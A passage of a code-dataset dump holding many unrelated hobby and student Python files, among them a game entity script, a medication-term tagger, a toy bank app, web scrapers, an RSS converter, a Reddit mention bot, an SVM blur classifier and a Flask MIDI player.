事件源,被监听者,默认为None,本来是参数,为了简化去掉了\n source = source or self\n if not source.event_listeners:\n source.event_listeners = {}\n # 被监听者的监听者表\n add_listener(source.event_listeners, event, self, fn)\n # 监听者的正在监听表\n add_listener(self.event_listening, event, source, fn)\n\n def remove_event_callback(self, event, fn, source=None):\n \"\"\"\n listen_for_event的逆操作\n :param event:\n :param fn:\n :param source:\n :return:\n \"\"\"\n source = source or self\n remove_listener(source.event_listeners, event, self, fn)\n remove_listener(self.event_listening, event, source, fn)\n\n def 
remove_all_event_callbacks(self):\n \"\"\"\n /\n :return:\n \"\"\"\n # 不再监听事件\n if self.event_listening:\n for event, sources in self.event_listening.iteritems():\n for source, fns in sources.iteritems():\n if source.event_listeners:\n listeners = source.event_listeners.get(event, None)\n if listeners:\n del listeners[self]\n self.event_listening = {}\n if self.event_listeners:\n for event, listeners in self.event_listeners.iteritems():\n for listener, fns in listeners.iteritems:\n if listener.event_listening:\n sources = listener.event_listening.get(event, None)\n if sources:\n del sources[self]\n self.event_listeners = {}\n\n @logger_tail\n def dump_event_map(self):\n return self.event_listening, self.event_listeners\n\n # ---------------------------------------------------\n # stategraph\n # ---------------------------------------------------\n def set_stategraph(self, name):\n stategraph.set_stategraph(self, name)\n\n def clear_stategraph(self):\n stategraph.clear_stategraph(self)\n\n # ---------------------------------------------------\n # brain\n # ---------------------------------------------------\n @logger\n def restart_brain(self):\n self.stop_brain()\n if not self.brainfn:\n return\n self.brain = self.brainfn()\n if not self.brain:\n return\n self.brain.inst = self\n self.brain.start()\n\n @logger\n def stop_brain(self):\n self.brain and self.brain.stop()\n self.brain = None\n\n @logger\n def set_brain(self, brainfn):\n self.brainfn = brainfn\n self.restart_brain()\n\n # ---------------------------------------------------\n # 生命周期\n # ---------------------------------------------------\n def is_valid(self):\n \"\"\"\n C++层是否存活\n :return:\n \"\"\"\n # return self.entity:IsValid() and not self.retired\n return True\n\n @logger\n def return_to_scene(self):\n self.restart_brain()\n self.sg and self.sg.start()\n\n @logger\n def remove_from_scene(self):\n self.stop_brain()\n self.sg and self.sg.stop()\n\n # ---------------------------------------------------\n # component\n # ---------------------------------------------------\n def add_component(self, name, *args, **kwargs):\n if name in self.components:\n raise \"component %s already exists!\" % name\n cmptfn = load_script('components.', name)\n assert cmptfn, \"component %s does not exists!\" % name\n cmpt = cmptfn(self, *args, **kwargs)\n self.components[name] = cmpt\n\n def remove_component(self, name):\n cmpt = self.components[name]\n if not cmpt:\n return\n del self.components[name]\n on_remove_from_entity = getattr(cmpt, \"on_remove_from_entity\", None)\n on_remove_from_entity and on_remove_from_entity()\n\n def has_component(self, name):\n return name in self.components\n\n def get_component(self, name):\n return self.components[name]\n\n def get_component_try(self, name):\n return self.components[name] if self.has_component(name) else None\n\n def get_component_of_type(self, name):\n cls = load_script('components.', name)\n for _, cmpt in self.components:\n if isinstance(cmpt, cls):\n return cmpt\n return None\n\n # ---------------------------------------------------\n # tag\n # ---------------------------------------------------\n def add_tag(self, tag):\n self.tags.add(tag)\n\n def remove_tag(self, tag):\n self.tags.discard(tag)\n\n def has_tag(self, tag):\n return tag in self.tags\n\n # ---------------------------------------------------\n # meta-methods\n # ---------------------------------------------------\n def __str__(self):\n return \"EntityScript\" + repr((id(self),))\n\n __repr__ = __str__\n\n\nif __name__ == 
'__main__':\n pass\n","sub_path":"Prototype/entityscript.py","file_name":"entityscript.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"353257974","text":"import sys\n\nfile = open(sys.argv[1],'r').read()\nfile = file.lower()\n\nfileName = sys.argv[1].split('/')[-1]\n\nentries = open(sys.argv[2],'r')\nentries = entries.readlines()\n\ncounter = 0\n\nfinalOutput = []\n\ndef chk(word,counter):\n\tif word[0]>='a' and word[0]<='z':\n\t\tif file[counter-1] >='a' and file[counter-1]<='z':\n\t\t\treturn False\n\t\tif file[counter+len(word)] >='a' and file[counter+len(word)]<='z':\n\t\t\treturn False\n\n\tif word[0]>='0' and word[0]<='9':\n\t\tif file[counter-1] >='0' and file[counter-1]<='9':\n\t\t\treturn False\n\t\tif file[counter+len(word)] >='0' and file[counter+len(word)]<='9':\n\t\t\treturn False\n\n\treturn True\n\n\n\ndef addPunct(counter):\n\t#.......................punct.\t\n\t# ind = counter+1\n\t# while ind 0 and (file[counter] == ' ' or file[counter] == 'x' or file[counter] == '/n' or (file[counter] >= '0' and file[counter] <= '9' )):\n\t\tcounter-=1\n\tif counter != counter2:\n\t\tcounter+=1\n\tif counter2 == counter:\n\t\treturn counter\n\twhile file[counter] == ' ':\n\t\tcounter+=1\n\treturn counter\n\n\nfor line in entries:\n\tline = line[:-1]\n\tpres_entry = line.split('\\t')\n\tif len(pres_entry) < 3:\n\t\tcontinue\n\n\t#...........unhandled .............................\n\tif pres_entry[-1] == '0':\n\t\tif pres_entry[0] == \"medications\" or pres_entry[0] == \"medication\" or pres_entry[0] == \"supplementation\" or pres_entry[0] == \"morning\" or pres_entry[0] == \"times\" or pres_entry[0] == \"day\" or pres_entry[0] == \"once\" or pres_entry[0] == \"days\" or pres_entry[0] == \"minutes\" or pres_entry[0] == \"a.m.\" or pres_entry[0] == \"p.m.\" or pres_entry[0] == \"once\"or pres_entry[0] == \"every\" :\n\t\t\tpres_entry[-1] = \"medication\"\n\t\telse :\n\t\t\tcontinue\n\tword = pres_entry[0]\n\t\n\twhile counter + len(word) < len(file) :\n\t\n\t\tif word == file[counter:counter+len(word)].replace(\"^[0-9a-z]\",\" \") and chk(word,counter):\n\t\t\tbreak\n\t\tcounter+=1\n\t# print(counter,counter+len(word),file[counter:counter+len(word)])\n\tstrt = counter\n\tend = counter+len(word)\n\t# strt=addNumber(counter)\n\t# end = addPunct(counter+len(word))\n\t# print(strt,end)\n\t# print(word)\n\tinsert = [fileName , strt , end , file[strt:end] , pres_entry[-1]]\n\t# print(insert)\n\tfinalOutput.append(insert)\n\tcounter+=1\n\nfor i in range(len(finalOutput)):\n\tif i < len(finalOutput)-1 and finalOutput[i][1] == finalOutput[i+1][1] :\n\t\tcontinue\t\n\tif \ti < len(finalOutput)-1 and int(finalOutput[i][2]) + 3 >= int(finalOutput[i+1][1]):\n\t\tfinalOutput[i+1][1] = finalOutput[i][1]\n\t\tfinalOutput[i+1][3] = finalOutput[i][3] +\" \"+ finalOutput[i+1][3]\n\t\tcontinue\n\tif \ti < len(finalOutput)-1 and int(finalOutput[i][2]) >= int(finalOutput[i+1][1]):\n\t\tfinalOutput[i+1] = [finalOutput[i][0] , finalOutput[i][1],finalOutput[i+1][2],file[int(finalOutput[i][1]):int(finalOutput[i+1][2])],finalOutput[i][-1] if (finalOutput[i][-1] != \"0\" ) else finalOutput[i+1][-1]]\n\t\tcontinue\n\n\tx = finalOutput[i]\t\n\n\tfl = True\n\tfor a in x[3]:\n\t\tx[3] = x[3].strip()\n\t\tif a>=\"a\" and a<=\"z\" :\n\t\t\tfl = False\n\tif fl:\n\t\tcontinue\n\tx[3]=x[3].lower()\n\tif x[3].strip() == \"home\" or x[3].strip() == \"blood\" or x[3].strip() == \"day\" or x[3].strip() == \"days.\" or x[3].strip() 
== \"dep\" or x[3].strip() == \"days\" or x[3].strip() == \"every\" or len(x[3].strip())<=3 :\n\t\tcontinue\n\tx = [str(i) for i in x]\n\ts = x[0]+'|'+x[1]+'-'+x[2]+'|'+x[3]+'|'+x[4]\n\tprint(s)\n","sub_path":"007_medicationHandler.py","file_name":"007_medicationHandler.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"617112337","text":"def main():\n s = input()\n x_up = y_up = z_up = -float('Inf')\n x_down = y_down = z_down = float('Inf')\n while s != \"\":\n x, y, z = map(float, s.split(','))\n if (x > x_up):\n x_up = x\n if (x < x_down):\n x_down = x\n if (y > y_up):\n y_up = y\n if (y < y_down):\n y_down = y\n if (z > z_up):\n z_up = z\n if (z < z_down):\n z_down = z\n s = input()\n print((x_up - x_down) * (y_up - y_down) * (z_up - z_down))\n\nif __name__ == \"__main__\":\n main()","sub_path":"02_Conditionals/dot_box.py","file_name":"dot_box.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"579404975","text":"class person:\n def setvalues(self, name, age):\n self.age = age\n self.name = name\n\n def printvalues(self):\n print(self.name)\n print(self.age)\n\n\nclass bank(person):\n bnkname=\"SDK\"\n def __init__(self, ac_no, name, bal):\n self.ac_no = ac_no\n self.name = name\n self.bal = bal\n\n def balenq(self):\n print(\"Ac No :\", self.ac_no)\n print(\"Name :\", self.name)\n print(\"Balance:\", self.bal)\n\n def withdraw(self, amount):\n if amount > self.bal:\n print(\"Insuffiient balance\\nAvailable balance:\", self.bal)\n else:\n self.bal -= amount\n print(\"Amount withdrawn:\", amount, \"\\nBalance amount:\", self.bal)\n\n def deposit(self, amount):\n self.bal += amount\n print(\"Amount deposited:\", amount, \"\\nBalance amount:\", self.bal)\n\nobj = bank(1001, \"Manu,\", 30000)\nn = 1\nwhile (n == 1):\n print(\"1.Check Ac details\\n2.Deposit\\n3.Withdraw\\n4.exit\")\n x = int(input(\"Enter your choice: \"))\n if x == 1:\n obj.balenq()\n elif x == 2:\n y = int(input(\"Enter amount to deposit: \"))\n obj.deposit(y)\n elif x == 3:\n z = int(input(\"Enter amount to withdraw: \"))\n obj.withdraw(z)\n elif x == 4:\n n = 0\n break\n else:\n print(\"Invalid entry\")\n n = int(input(\"\\nprogram exiting....Press '1' to return to main menu:\"))\n","sub_path":"Luminar/Copy/Language fundamentals/oops/bankapp.py","file_name":"bankapp.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"434784727","text":"from settings import *\n\nINSTALLED_APPS.append('gencmd')\nINSTALLED_APPS.append('django_nose')\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n# ROOT_URLCONF = 'gencmd.tests.api_urls'\n# MEDIA_URL = 'http://localhost:8080/media/'\n\n# LOGGING = {\n # 'version': 1,\n # 'disable_existing_loggers': True,\n # 'handlers': {\n # 'simple': {\n # 'level': 'ERROR',\n # 'class': 'core.utils.SimpleHandler',\n # }\n # },\n # 'loggers': {\n # 'django.request': {\n # 'handlers': ['simple'],\n # 'level': 'ERROR',\n # 'propagate': False,\n # },\n # }\n# }\n","sub_path":"tests/settings_gencmd.py","file_name":"settings_gencmd.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"341410066","text":"# 5. 
Account charge verification.\n\n# The file named charge_accounts.txt contains a list of company account\n# numbers. Each number is a seven-digit number, such as 5658845. Write a\n# program that reads the contents of this file into a list. Then the user\n# should be able to enter an account number, and the program should check\n# whether it is a valid number by searching for it in the list.\n\ndef getFile():\n file = open(\"charge_accounts.txt\", 'r')\n readFile = file.readlines()\n file.close()\n return readFile\n\ndef getConvertNumber(number):\n index = 0\n while index < len(number):\n number[index] = int(number[index])\n index += 1\n\n print(number)\n\n return number\n\ndef getNumber():\n accountNumber = int(input(\"Enter the account number: \"))\n\n return accountNumber\n\ndef main():\n openFile = getFile()\n converNumber = getConvertNumber(openFile)\n accountNumber = getNumber()\n\n if accountNumber in converNumber:\n print(\"ok\")\n else:\n print(\"wrong\")\n\nmain()","sub_path":"Rozdzial7/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} {"seq_id":"539819272","text":"from math import pi\nimport matplotlib.pyplot as plt\n\ndef radar_plot(data,title='Radar'):\n\t\"\"\"\n\t\"\"\"\n\tAttributes =list(data.keys())\n\tAttNo = len(Attributes)\n\tvalues = list(data.values())\n\tvalues += values [:1]\n\tangles = [n / float(AttNo) * 2 * pi for n in range(AttNo)]\n\tangles += angles [:1]\n\tfigureEUI=plt.figure()\n\t\n\tax=figureEUI.add_subplot(2,2,1)\n\tax = plt.subplot(111, polar=True)\n\t#Add the attribute labels to our axes\n\tplt.xticks(angles[:-1],Attributes)\n\n\t#Plot the line around the outside of the filled area, using the angles and values calculated before\n\tax.plot(angles,values)\n\n\t#Fill in the area plotted in the last line\n\tax.fill(angles, values, 'teal', alpha=0.1)\n\n\t#Give the plot a title and show it\n\tax.set_title(title)\n\tplt.show()","sub_path":"core/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} {"seq_id":"453469276","text":"#author Tom Ruijgrok\n\nimport matplotlib.pyplot as plt \nimport numpy as np \n\n#variables:\n\nv0 = 10 #m/s\nx0 = 0 #m\nm = 200 #kg\ndt = 0.01\nt0 = 0 \nt1 = 10\n\nt = np.linspace(t0, t1,int(1+(t1-t0)/dt))\n\ndef verplaatsingnumeriek(t):\n x_num = np.zeros(len(t))\n v_num = np.zeros(len(t))\n x_num[0] = x0\n v_num[0] = v0\n for n in range(len(t)-1):\n a = (-10*(v_num[n])**3)/m\n x_num[n+1] = x_num[n] + v_num[n]*dt\n v_num[n+1] = v_num[n] + a*dt\n return a, x_num, v_num\n\na, x_num, v_num = verplaatsingnumeriek(t)\n\nprint('v:', v_num[-1], 'm/s')\nprint('s:', x_num[800] ,'m')\n\n","sub_path":"Opgave 2/2C.py","file_name":"2C.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} {"seq_id":"115934795","text":"from flask import Flask,render_template\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport mission_to_mars as mtm\n\napp = Flask(__name__)\n\n@app.route('/scrape')\ndef scrape():\n mng_latest=mtm.mng_latest()\n featured_image_url=mtm.featured_image_url()\n mars_weather=mtm.mars_weather()\n mars_facts=mtm.mars_facts()\n hemisphere_image_urls=mtm.hemisphere_image_urls()\n return render_template('index.html',mng_latest=mng_latest,featured_image_url=featured_image_url,\n 
mars_weather=mars_weather,mars_facts=mars_facts,hemisphere_image_urls=hemisphere_image_urls)\n \n@app.route('/shutdown', methods=['POST'])\ndef shutdown():\n shutdown_server()\n return 'Server shutting down...'\n\n\nif __name__=='__main__':\n app.run()","sub_path":"hw11_scraping/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"134717503","text":"from lib.colors import color\nfrom lib.relib import refind\nfrom operator import itemgetter\nfrom requests.exceptions import ConnectionError\nimport requests\nimport sys\nimport re\n\nclass tineye:\n\tdef __init__(self,type,content):\n\t\tself.type = type\n\t\tself.content = content\n\t\tself.image_url = \"https://www.tineye.com/search\"\n\t\tself.headers = {\n\t\t\"Host\": \"www.tineye.com\",\n\t\t\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\",\n\t\t\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n\t\t\"Accept-Encoding\": \"gzip, deflate, br\",\n\t\t\"Accept-Language\": \"en-US,en;q=0.5\",\n\t\t\"Referer\": \"https://www.tineye.com/\",}\n\n\tdef search(self):\n\t\tsession = requests.Session()\n\t\tsession.headers.update(self.headers)\n#\t\tif self.type == 'image':\n#\t\t\ttry:\n#\t\t\t\tfile = {'upload_file': open(self.filename,'rb')}\n#\t\t\texcept FileNotFoundError:\n#\t\t\t\tprint(color.FAIL+\"\\n[!]No such file '\"+self.filename+\"' .\\n\"+color.ENDC)\n#\t\t\t\tsys.exit()\n#\t\tdata = {\n#\t\t'Content-Disposition': 'form-data; name=\"image\"; filename=\"'+self.filename+'\"',\n#\t\t'Content-Type': 'image/jpeg'\n#\t\t}\n#\t\t\treq = session.post(self.image_url, files = file).text\n#\t\t\tprint(req)\n\t\tif self.type == 'url':\n\t\t\tdata = {\"url\":self.content}\n\t\t\tprint(color.OKGREEN+'\\n[*]Sending URL to tineye.'+color.ENDC)\n\t\t\treq = session.post(self.image_url, data = data).text\n#\t\t\tBEGINNING OF TAG SEARCH\n\t\t\threfs = refind('

Found on: item > link,description,title\n# iterate news items\nfor item in root.findall('./channel/item'):\n news = {}\n\n for child in item:\n if (child.tag == \"title\") or(child.tag == \"link\") or (child.tag == \"description\"):\n news[child.tag] = str(child.text.encode('utf8'))\n\n if len(news) == 3:\n newsitems.append(news)\n\n\n\n# writes json file\nfeed = open( path +filename[:filename.find(\".\")]+\".json\", \"w\")\nfeed.write('''{\n \"link\":\"''' + chlink[2:(len(chlink)-1)] + '''\",\n \"article\":''' + json.dumps(newsitems)+\"}\")\n\nfeed.close()\nfile.close()","sub_path":"updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"652000019","text":"# iterator are objects that can we iterated upon, you can built own iterator using iter_and next_methods, collectively called the iterator protocal\n\nmy_list = [1,2,3,4,5]\n\n#my_iter = iter(my_list) or\n\nmy_iter = my_list.__iter__()\n\nfor i in my_list:\n #print(next(my_iter)) or\n print(my_iter.__next__())\n","sub_path":"Python/Interview Que/Interview Companies/Helious/Iterators.py","file_name":"Iterators.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"616319857","text":"import random\nimport sys\nfrom datetime import date\nimport os\n\nwhile True:\n # chooses the mode, either addition or multiplication\n mode_input = input(\"Choose a testing mode: add(ition) or mult(iplication)\")\n\n if mode_input in 'addition':\n mode = '+'\n break\n elif mode_input in 'multiplication':\n mode = '*'\n break\n else:\n print(\"Invalid Mode. Must be either add(ition) or mult(iplication).\")\n\n# creates a file to write the results of the test\nnew_file_name = '{}_{}_test.txt'.format(str(date.today()), mode_input)\n\nif not os.path.exists('./results'):\n os.mkdir('./results')\n\nfile_path = './results' + new_file_name\n\nlimit = 12\n\nwith open(file_path, 'w') as file:\n # initiates the test\n operand_pairs = []\n\n for i in range(limit):\n for j in range(limit):\n operand_pairs.append((i + 1, j + 1))\n\n random.shuffle(operand_pairs)\n\n for current_pair in operand_pairs:\n\n correct_answer = 0\n\n if mode == '+':\n correct_answer = current_pair[0] + current_pair[1]\n elif mode == '*':\n correct_answer = current_pair[0] * current_pair[1]\n\n question = '{} {} {}'.format(current_pair[0], mode, current_pair[1])\n\n while True:\n try:\n guess = int(input(question + ' = '))\n break\n except ValueError:\n print(\"Invalid input, try again.\")\n\n if guess == correct_answer:\n print(\"Correct\")\n else:\n print(\"Incorrect. 
Correct answer was \" + str(correct_answer))\n file.write('For {}\\nguessed: {}, answer : {}\\n\\n'.format(question, guess, correct_answer))\n","sub_path":"RandomAdditionMultiplicationTesting/RandomAddMult.py","file_name":"RandomAddMult.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"157928172","text":"import praw, time\nfrom pprint import pprint\n\nprint('Connecting to reddit...')\n\nr = praw.Reddit('CharredMailBot v1.0 by charredgrass')\nr.login('CharredBot','somepassword')\n\nprint('Success!')\nprint('Reading comments.txt and users.txt.')\nf = open('comments.txt','r')\nalready_done = f.read()\nf.close()\nf = open('users.txt','r')\nusers = f.read().split()\nf.close()\n\nprint('Success!')\n\nsubreddit = 'Frozenfriendsfriends'\n\n\nwhile True:\n print('Scanning ' + subreddit + ' for mentions')\n comments = r.get_comments(subreddit)\n for comment in comments:\n num_names = 0\n already_sent = []\n words = comment.body.replace('?',' ').replace('.',' ').replace('!',' ').replace('\\'',' ').split()\n if '/u/' in comment.body and comment.id not in already_done:\n print('Comment Found! Logging...')\n already_done += ' '+comment.id\n f = open('comments.txt', 'w')\n f.write(already_done)\n f.close()\n for word in words:\n if word[:3] == '/u/':\n user_send_pm = word[3:]\n pprint(user_send_pm)\n u = None\n try:\n u = r.get_redditor(user_send_pm)\n if not (u.is_gold and num_names < 3):\n #Do not send message.\n if (not u == comment.author):# and (not u == comment.parent.author):\n if not u == None:\n r.send_message(u.name,'Username mention!','You have recieved a mention!\\n\\n' + comment.permalink)\n print('Message sent to ' + u.name)\n except:\n print('User ' + u.name + ' not found.')\n \n num_names += 1\n print('Waiting 30s before scanning again.')\n time.sleep(30)","sub_path":"CharredMailBot.py","file_name":"CharredMailBot.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"272837594","text":"#\n# Copyright (c) 2020 IBM Corp.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\nThe ``jupyter`` module contains functions to support the use of Text Extensions for Pandas\n in Jupyter notebooks.\n\"\"\"\n#\n# jupyter.py\n#\n# Part of text_extensions_for_pandas\n#\n#\n#\n\nimport pandas as pd\nimport numpy as np\nimport time\nfrom typing import *\n\n\ndef run_with_progress_bar(num_items: int, fn: Callable, item_type: str = \"doc\") \\\n -> List[pd.DataFrame]:\n \"\"\"\n Display a progress bar while iterating over a list of dataframes.\n\n :param num_items: Number of items to iterate over\n :param fn: A function that accepts a single integer argument -- let's\n call it `i` -- and performs processing for document `i` and returns\n a `pd.DataFrame` of results\n :param item_type: Human-readable name for the items that the calling\n code is iterating over\n\n \"\"\"\n # Imports inline to avoid creating a 
hard dependency on ipywidgets/IPython\n # for programs that don't call this function.\n # noinspection PyPackageRequirements\n import ipywidgets\n # noinspection PyPackageRequirements\n from IPython.display import display\n\n _UPDATE_SEC = 0.1\n result = [] # Type: List[pd.DataFrame]\n last_update = time.time()\n progress_bar = ipywidgets.IntProgress(0, 0, num_items,\n description=\"Starting...\",\n layout=ipywidgets.Layout(width=\"100%\"),\n style={\"description_width\": \"12%\"})\n display(progress_bar)\n for i in range(num_items):\n result.append(fn(i))\n now = time.time()\n if i == num_items - 1 or now - last_update >= _UPDATE_SEC:\n progress_bar.value = i + 1\n progress_bar.description = f\"{i + 1}/{num_items} {item_type}s\"\n last_update = now\n progress_bar.bar_style = \"success\"\n return result\n\n\ndef pretty_print_html(column: Union[\"SpanArray\", \"TokenSpanArray\"],\n show_offsets: bool) -> str:\n \"\"\"\n HTML pretty-printing of a series of spans for Jupyter notebooks.\n\n Args:\n column: Span column (either character or token spans)\n show_offsets: True to generate a table of span offsets in addition\n to the marked-up text\n \"\"\"\n\n # Generate a dataframe of atomic types to pretty-print the spans\n spans_html = column.as_frame().to_html()\n\n # Build up a mask of which characters in the target text are within\n # at least one span.\n text = column.target_text\n mask = np.zeros(shape=(len(text)), dtype=np.bool)\n # TODO: Vectorize\n for e in column:\n mask[e.begin:e.end] = True\n\n # Walk through the text, building up an HTML representation\n text_pieces = []\n for i in range(len(text)):\n if mask[i] and (i == 0 or not mask[i - 1]):\n # Starting a highlighted region\n text_pieces.append(\n \"\"\"<span style=\"background-color:yellow\">\"\"\")\n elif not (mask[i]) and i > 0 and mask[i - 1]:\n # End of a highlighted region\n text_pieces.append(\"</span>\")\n if text[i] == \"\\n\":\n text_pieces.append(\"<br>\")\n elif text[i] == \"&\":\n text_pieces.append(\"&amp;\")\n elif text[i] == \"<\":\n text_pieces.append(\"&lt;\")\n elif text[i] == \">\":\n text_pieces.append(\"&gt;\")\n elif text[i] == \"\\\"\":\n # Not strictly necessary, but just in case.\n text_pieces.append(\"&quot;\")\n elif text[i] == \"'\":\n # Not strictly necessary, but just in case.\n text_pieces.append(\"&#39;\")\n elif text[i] == \"$\":\n # Dollar sign messes up Jupyter's JavaScript UI.\n # Place dollar sign in its own sub-span to avoid being misinterpreted as a LaTeX delimiter\n text_pieces.append(\"<span>$</span>\")\n else:\n text_pieces.append(text[i])\n\n # TODO: Use CSS here instead of embedding formatting into the\n # generated HTML\n if show_offsets:\n return f\"\"\"\n
<table style=\"width: 100%;\">\n            <tr>\n                <td style=\"vertical-align: top;\">\n                    {spans_html}\n                </td>\n                <td style=\"vertical-align: top;\">\n                    {\"\".join(text_pieces)}\n                </td>\n            </tr>\n        </table>\n        \"\"\"\n    else:  # if not show_offsets\n        return f\"\"\"\n        <div>\n            {\"\".join(text_pieces)}\n        </div>
\n \"\"\"","sub_path":"text_extensions_for_pandas/jupyter.py","file_name":"jupyter.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"623815305","text":"import numpy as np \n\nfrom scipy.ndimage import variance\nfrom skimage import io\nfrom skimage.color import rgb2gray\nfrom skimage.filters import laplace\nfrom skimage.transform import resize\nfrom sklearn import preprocessing, svm\nfrom sklearn.externals import joblib\nfrom sklearn import metrics\n\nimport os\nimport sys\nimport matplotlib.pyplot as plt\n\n# Load image\nnot_blurry_folder = f'/home/duong/Documents/researching/GAN/common/image_enhance/image_cmt/test_good'\nblurry_folder = '/home/duong/Documents/researching/GAN/common/image_enhance/image_cmt/test_blurry'\n\ndef laplace_image(input_folder):\n sub_folders = os.listdir(input_folder)\n variances = []\n maximumes = []\n\n for folder in sub_folders:\n sub_folder = os.path.join(input_folder,folder)\n if not os.path.isdir(sub_folder):\n continue\n list_file = os.listdir(sub_folder)\n\n for file in list_file:\n if file.endswith(('.png','.jpg','JPEG')):\n input_file = os.path.join(sub_folder,file)\n\n #preprocessing\n img = io.imread(input_file)\n img = resize(img,(400,600))\n img = rgb2gray(img)\n\n #Edge Detection use Laplace\n edge_laplace = laplace(img, ksize=3)\n\n #print(f\"Variance: {variance(edge_laplace)}\")\n variances.append(variance(edge_laplace))\n\n #print(f'Maximum: {np.amax(edge_laplace)}')\n maximumes.append(np.amax(edge_laplace))\n return variances, maximumes\n\nvariances, maximumes = laplace_image(not_blurry_folder)\nvariances1, maximumes1 = laplace_image(blurry_folder)\n\nprint('length of sharp:',len(variances))\nprint('length of blurry:',len(variances1))\n\nload_model = False\nuse_svm = True\n\nsharp_laplaces = list(zip(variances,maximumes))\nblurry_laplaces = list(zip(variances1, maximumes1))\n\ny = np.concatenate((np.ones((51,)), np.zeros((51,))), axis=0)\nprint(\"y = \",y)\nlaplaces = np.concatenate((np.array(sharp_laplaces), np.array(blurry_laplaces)), axis=0)\n\n#laplaces = preprocessing.scale(laplaces)\n\n\nclf = svm.SVC(kernel='linear')\nclf.fit(laplaces, y)\n\n# print(\"Accuracy :\",metrics.accuracy_score(laplaces[:50],y[:50]))\n\nprint(f'Weights: {clf.coef_[0]}')\nprint(f'Intercept: {clf.intercept_}')\n\nr1 = clf.predict([[0.00040431, 0.1602369]]) # result: 0 (blurred)\nr2 = clf.predict([[0.01, 0.6]]) # result: 1 (sharp)\nprint('r1 = ',r1)\nprint('r2 = ',r2)\n\n#save model\njoblib.dump(clf, 'laplaces_model.pkl')\n\nclf = joblib.load('laplaces_model.pkl')\nresutl = clf.predict(np.array([blurry_laplaces[33]]))\nprint(resutl)\n\nresutl = clf.predict(np.array([sharp_laplaces[30]]))\nprint(resutl)\n\nx0 = [0,0.02]\ny0 = [0.5,0]\n\nplt.plot(variances, maximumes,'ro')\nplt.plot(variances1, maximumes1,'b.')\n#plt.plot(x0,y0)\nplt.plot()\n#plt.axis([0.0, 0.1, 0.0, 3.0])\nplt.xlabel('Variance (Laplace)')\nplt.ylabel('Maximum (Laplace)')\nplt.grid(True)\nplt.show()\n\n","sub_path":"support_deblurry_GAN/svm_train_detect_blurry.py","file_name":"svm_train_detect_blurry.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"18975726","text":"# glass pla!te changes pathlength\r\nn = 1.4\r\nl = 800\r\na= linspace(1, 40, 100) * pi / 180\r\nb = arcsin(sin(a)/n)\r\nr = a - b\r\nd = 3000000 # nm\r\np = (( n * d / cos(b) + d ) - (n * d + d * cos(r) / cos(b)))/l * 4 * 180 / 
pi\r\nfigure;plot(p-p[1])\r\ndd = (( n * d / cos(b) + d ) - (n * d + d * cos(r) / cos(b))) / 1000\r\nplot(diff(dd))\r\n","sub_path":"PythonVersion/python_optics.py","file_name":"python_optics.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"28028006","text":"from flask import Flask, render_template, flash, request, redirect, url_for\nfrom werkzeug.utils import secure_filename\nfrom threading import Thread\n\nimport os\nimport hashlib\nimport serial\nimport mido\n\n#Change working directory to current directory\nos.chdir(os.path.dirname(__file__))\n\n#Config data\nUPLOAD_FOLDER = os.getcwd() + '/uploads'\nTEMP_FOLDER = os.getcwd() + '/temp'\nALLOWED_EXTENSIONS = set(['midi', 'mid'])\n\nSEPERATOR='_:#:_'\n\nif not os.path.exists(UPLOAD_FOLDER):\n os.makedirs(UPLOAD_FOLDER)\nif not os.path.exists(TEMP_FOLDER):\n os.makedirs(TEMP_FOLDER)\n\n#Create application\napp = Flask(__name__)\n\n#Configure application\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['TEMP_FOLDER'] = TEMP_FOLDER\n\n#Music variables\nthread = \"\"\nstop = False\nplaing = 